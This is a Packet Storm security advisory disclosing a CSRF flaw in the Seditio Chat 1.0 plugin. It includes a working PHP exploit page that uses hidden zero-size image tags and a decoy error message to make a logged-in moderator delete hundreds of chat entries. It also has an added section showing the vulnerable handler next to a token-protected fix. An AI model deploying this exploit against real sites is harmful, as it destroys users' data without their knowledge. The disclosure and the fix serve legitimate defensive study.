Seditio Chat 1.0 Cross Site Request Forgery

2012-04-11T00:00:00
ID PACKETSTORM:111757
Type packetstorm
Reporter Akastep
Modified 2012-04-11T00:00:00

Description

                                        
                                            `=========================================================  
Vulnerable Software: Seditio Chat Plugin (Chat İndex Plugin) v 1.0  
http://www.seditio-eklenti.com/page.php?id=418  
http://www.seditio-eklenti.com/chat-plugin-index-d418.html  
Downloaded: http://www.seditio-eklenti.com/datas/users/1-chat.rar  
(MD5 SUM: d1565b438199984661cf2147572724a6 *1-chat.rar)  
=========================================================  
Tested:  
With Seditio v165  
*php.ini MAGIC_QUOTES_GPC OFF*  
Safe mode off  
/*  
OS: Windows XP SP2 (32 bit)  
Apache: 2.2.21.0  
PHP Version: 5.2.17.17  
mysql> select version()  
-> ;  
+-----------+  
| version() |  
+-----------+  
| 5.5.21 |  
+-----------+  
*/  
=========================================================  
About Software:  
Seditio Chat Plugin (Chat İndex Plugin) v 1.0 is a popular plugin for Seditio CMS.  
It gives users, administrators and moderators the ability to chat.  
=========================================================  
Vuln Desc:  
This plugin is prone to a CROSS SITE REQUEST FORGERY vulnerability.  
Chat entries are deleted in response to a bare $_GET request (plug.php?e=chat&c=delete&id=N) with no check that the request was actually intended by the user, such as an anti-CSRF token; the browser attaches the victim's session cookie automatically, so the request is accepted.  
A malicious site can therefore delete chat entries simply by getting a logged-in user with delete rights (an administrator or moderator) to load a page that embeds such URLs, for example in hidden <img> tags.  
================ Seditio chat plugin Delete chat entries CSRF exploit =================  
<?php  
/*  
4 Fun  
Seditio chat plugin Delete chat entries CSRF exploit (Sounds peaceful xD)  
Serve this page to a logged-in Seditio administrator/moderator: the browser  
fetches every <img> below with the victim's session cookie, and the plugin  
deletes chat entries 0..$howmuch.  
*/  
$target='http://192.168.0.15/learn/128/sed/seditio165/'; // target site (Seditio root)  
$howmuch=500;// how much entries to "rm" in chat? :)  
  
/* Do not change */  
  
$target=rtrim($target,'/'); // avoid a doubled slash before /plug.php  
$body=str_repeat(PHP_EOL,300); // push the visible text far below the fold  
$howmuch=(int)$howmuch;  
$sithere=strrev('OoPs! Can not Load Page.WTH? What about Refresh ?');// 4 think about :D.While we deleting chat entries:D  
// one invisible image per chat id; each load is a GET to plug.php?e=chat&c=delete&id=N  
for($i=0;$i<=$howmuch;$i++)  
{  
$body.='<img src="'. $target . '/plug.php?e=chat&c=delete&id=' . $i . '" width="0" height="0" /><br>' .PHP_EOL;  
}  
die($body . '<h1>' . $sithere . '</h1>');  
/* EOF */  
?>  
==============================EOF================================  
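The following is an added example, not code from the plugin, from Seditio or from the advisory author. It places the pattern the advisory describes (a chat row deleted by a bare GET request authenticated only by the session cookie) next to a hardened handler that accepts the delete only over POST and only with a per-session anti-CSRF token, and renders the delete control as a form that carries that token. Function names, the `chat` table layout, the in-memory SQLite database and the session handling are assumptions; Seditio's own helper API is not shown on the page.

```php
<?php
// Added example (not the plugin's code). Vulnerable delete handler beside a
// hardened one. Function names, table layout and session handling are
// assumptions. Runs stand-alone with php-cli using an in-memory SQLite DB.

if (PHP_SAPI !== 'cli' && session_status() === PHP_SESSION_NONE) {
    session_start(); // on the web the token must live in the server-side session
}

// Vulnerable pattern behind plug.php?e=chat&c=delete&id=N: the only thing
// checked is that the browser presented a moderator's session cookie, which it
// also does for an <img src="..."> embedded on any third-party page.
function chat_delete_vulnerable(PDO $db, array $get, bool $is_moderator): bool
{
    if (!$is_moderator || ($get['c'] ?? '') !== 'delete') {
        return false;
    }
    $stmt = $db->prepare('DELETE FROM chat WHERE id = ?');
    $stmt->execute([(int) ($get['id'] ?? 0)]);
    return $stmt->rowCount() === 1;
}

// Hardened: the state change is accepted only over POST (a cross-site <img>
// cannot POST) and only with a secret bound to the victim's session that a
// third-party page cannot read. hash_equals() keeps the comparison constant-time.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check($token): bool
{
    return is_string($token)
        && isset($_SESSION['csrf_token'])
        && hash_equals($_SESSION['csrf_token'], $token);
}

function chat_delete_hardened(PDO $db, string $method, array $post, bool $is_moderator): bool
{
    if ($method !== 'POST' || !$is_moderator || !csrf_check($post['csrf_token'] ?? null)) {
        return false; // on the web: answer 403 and log the attempt
    }
    $id = (int) ($post['id'] ?? 0);
    if ($id <= 0) {
        return false;
    }
    $stmt = $db->prepare('DELETE FROM chat WHERE id = ?');
    $stmt->execute([$id]);
    return $stmt->rowCount() === 1;
}

// The delete control in the chat view becomes a form carrying the token,
// instead of a plain link that any page can reproduce.
function render_delete_button(int $id): string
{
    return '<form method="post" action="plug.php?e=chat&amp;c=delete">'
        . '<input type="hidden" name="id" value="' . $id . '">'
        . '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">'
        . '<button type="submit">delete</button></form>';
}

// Demo on constructed data: three chat rows in a throwaway database.
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE chat (id INTEGER PRIMARY KEY, msg TEXT)');
foreach ([[1, 'hello'], [2, 'world'], [3, 'bye']] as [$id, $msg]) {
    $db->prepare('INSERT INTO chat VALUES (?, ?)')->execute([$id, $msg]);
}
$rows = fn() => (int) $db->query('SELECT COUNT(*) FROM chat')->fetchColumn();

// A forged GET (what the advisory's <img> tags send) succeeds against the vulnerable handler.
var_dump(chat_delete_vulnerable($db, ['c' => 'delete', 'id' => '1'], true));
// The same forged GET, a POST without a token and a POST with a guessed token all fail.
var_dump(chat_delete_hardened($db, 'GET',  ['id' => '2'], true));
var_dump(chat_delete_hardened($db, 'POST', ['id' => '2'], true));
var_dump(chat_delete_hardened($db, 'POST', ['id' => '2', 'csrf_token' => 'guess'], true));
// Only the legitimate form submission, carrying the session's token, deletes a row.
var_dump(chat_delete_hardened($db, 'POST', ['id' => '2', 'csrf_token' => csrf_token()], true));
echo $rows(), " rows left\n";
echo render_delete_button(3), "\n";
```

Two points worth keeping in mind when applying this to a real Seditio install: the token must be regenerated on login so a session fixated before authentication cannot be used to pre-seed it, and a referer check alone is a weaker substitute because the header is frequently stripped by proxies and privacy settings, which forces the site either to reject legitimate users or to accept requests without one.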
  
  
/AkaStep ^_^  
+++++++Greetz to all+++++++++++  
packetstormsecurity.*,securityfocus.com,cxsecurity.com,security.nnov.ru,securtiyvulns.com and to all others!  
Thank you.  